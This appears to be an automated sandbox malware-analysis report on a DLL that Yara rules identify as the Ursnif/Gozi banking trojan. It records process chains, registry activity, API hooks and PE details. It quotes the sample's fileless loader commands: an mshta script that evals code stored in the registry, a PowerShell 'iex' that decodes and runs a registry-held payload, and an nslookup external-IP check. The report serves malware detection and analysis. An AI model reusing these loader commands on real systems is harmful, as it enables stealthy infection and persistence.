Source: 00000016.00000003.789528617.000001F2CB9EF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
Source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html

Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winDLL@36/159@18/4

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_033F31DD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8F499AAE-6FE9-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{FE45D668-45B5-E0A5-BF12-491463668D88}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{F61F46FF-DD96-98AA-178A-614C3B5E2540}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_01
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{3E959709-853B-20F7-FF52-8954A3A6CDC8}

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF7FAEED37798869B9.TMP

Jump to behavior

Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll	Virustotal: Detection: 16%
Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll	ReversingLabs: Detection: 10%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll'
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82962 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17422 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82978 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3AD7.tmp' 'c:\Users\user\AppData\Local\Temp\gayi4abp\CSC8A545143BD644266B89F65F281FEEFE4.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4CF7.tmp' 'c:\Users\user\AppData\Local\Temp\wi0gyoxl\CSCA00873215094E3995281D323D18ADB7.TMP'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\9090.bi1'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82962 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17422 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82978 /prefetch:2
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3AD7.tmp' 'c:\Users\user\AppData\Local\Temp\gayi4abp\CSC8A545143BD644266B89F65F281FEEFE4.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4CF7.tmp' 'c:\Users\user\AppData\Local\Temp\wi0gyoxl\CSCA00873215094E3995281D323D18ADB7.TMP'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\9090.bi1'
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001A.00000002.810092544.0000017964DD0000.00000002.00000001.sdmp, csc.exe, 0000001C.00000002.818415180.0000022D72ED0000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000020.00000000.838540739.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.832600634.0000000006750000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: explorer.exe, 00000020.00000003.877702647.0000000006AD0000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.832600634.0000000006750000.00000004.00000001.sdmp
Source:	Binary string: \wl.pdb9 source: powershell.exe, 00000017.00000003.858136800.000001F6E100F000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: explorer.exe, 00000020.00000003.877702647.0000000006AD0000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000020.00000000.838540739.0000000005A00000.00000002.00000001.sdmp

Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline'

Source: unknown

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_033FAF23 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_033FABF0 push ecx; ret
Source: C:\Windows\explorer.exe	Code function: 32_2_04DAC115 push 3B000001h; retf
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DAC115 push 3B000001h; retf
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A433C115 push 3B000001h; retf

Source: initial sample

Static PE information: section name: .text entropy: 6.87914572387

Persistence and Installation Behavior:

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756986766.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.757116216.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756877993.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.757051571.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756945473.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.825598679.0000000003470000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.845341823.0000000003430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756743295.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5424, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5876, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Show sources

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Show sources

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Show sources

Source: explorer.exe

EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Source: C:\Windows\explorer.exe

Registry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550

Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
